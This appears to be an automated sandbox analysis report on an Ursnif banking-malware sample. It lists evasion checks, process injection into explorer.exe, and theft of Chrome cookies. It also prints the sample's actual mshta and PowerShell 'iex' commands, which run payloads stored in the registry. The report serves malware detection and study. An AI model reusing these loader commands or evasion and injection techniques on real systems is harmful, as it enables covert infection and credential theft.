Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0042DDB8 0_2_0042DDB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0042DDB8 1_2_0042DDB8
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Windows\System32\loaddll32.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 0_2_00438940
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 1_2_00438940
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3210
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5658
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.dll Jump to dropped file
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0042DDB8 0_2_0042DDB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0042DDB8 1_2_0042DDB8
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3040 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\explorer.exe TID: 5932 Thread sleep time: -1667865539s >= -30000s
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_004051E8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_004051E8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F37AA8 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_02F37AA8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_004051E8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 1_2_004051E8
Source: C:\Windows\explorer.exe Code function: 37_2_04DBA0C4 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 37_2_04DBA0C4
Source: C:\Windows\explorer.exe Code function: 37_2_04DBEEAC FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW, 37_2_04DBEEAC
Source: C:\Windows\explorer.exe Code function: 37_2_04DB537C FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindClose,RtlDeleteBoundaryDescriptor,RtlReleasePrivilege, 37_2_04DB537C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00421078 GetSystemInfo, 0_2_00421078
Source: WerFault.exe, 00000004.00000002.661025172.00000000050B0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 00000004.00000003.659310878.0000000004FDE000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: mshta.exe, 0000001D.00000003.822853558.000001BC04ECE000.00000004.00000001.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
Source: WerFault.exe, 00000004.00000002.661025172.00000000050B0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 00000004.00000002.661025172.00000000050B0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WerFault.exe, 00000004.00000003.659596838.000000000509F000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW}
Source: WerFault.exe, 00000004.00000002.661025172.00000000050B0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_00447EB0 LdrInitializeThunk, 1_2_00447EB0
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0042743C LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0042743C
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\loaddll32.exe Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processes
Source: C:\Windows\System32\loaddll32.exe Memory allocated: C:\Windows\System32\control.exe base: 1B0000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.0.cs Jump to dropped file
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: BD4F1580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 9F2000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 7FFABD4F1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 46C0000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 7FFABD4F1580 value: 40
Maps a DLL or memory area into another process
Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: unknown protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\loaddll32.exe Thread register set: target process: 5656 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3424
Source: C:\Windows\explorer.exe Thread register set: target process: 3656
Source: C:\Windows\explorer.exe Thread register set: target process: 4268
Source: C:\Windows\explorer.exe Thread register set: target process: 4772
Source: C:\Windows\explorer.exe Thread register set: target process: 4620
Source: C:\Windows\explorer.exe Thread register set: target process: 6276
Source: C:\Windows\explorer.exe Thread register set: target process: 6488
Source: C:\Windows\System32\control.exe Thread register set: target process: 3424
Source: C:\Windows\System32\control.exe Thread register set: target process: 5844
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF66A2D12E0 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 1B0000 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF66A2D12E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 9F2000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 46C0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8C7CFEF000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC08.tmp' 'c:\Users\user\AppData\Local\Temp\qxfma03s\CSC9A61D8937933426B894F97C05C536C75.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDFCF.tmp' 'c:\Users\user\AppData\Local\Temp\maejgtwh\CSC5E7D34BFE3B047248BD36616B57FD91.TMP'
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F3A446 cpuid 0_2_02F3A446
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\loaddll32.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 0_2_004053A0
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetACP, 0_2_0040C3B0
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA, 0_2_0040ADFC
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA, 0_2_0040AE48
Source: C:\Windows\System32\loaddll32.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 0_2_004054AC
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA, 0_2_00405C96
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA, 0_2_00405C98
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 1_2_004053A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetACP, 1_2_0040C3B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 1_2_0040ADFC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 1_2_0040AE48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 1_2_004054AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 1_2_00405C96
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 1_2_00405C98
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_004098C8 GetLocalTime, 0_2_004098C8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F3A446 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 0_2_02F3A446
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00453E60 GetVersion, 0_2_00453E60
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.704190908.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704338669.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.881249179.0000000000146000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.804269082.0000000004B5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704231467.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704303673.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.1038694426.0000027D4F836000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704163545.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.880565935.0000000001060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1047039764.0000000004DD6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.868598752.000001EB11270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704264515.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704123248.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.877735219.00000000030F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704325242.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5964, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4552, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000008
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000009
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000007
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000a
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000b
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
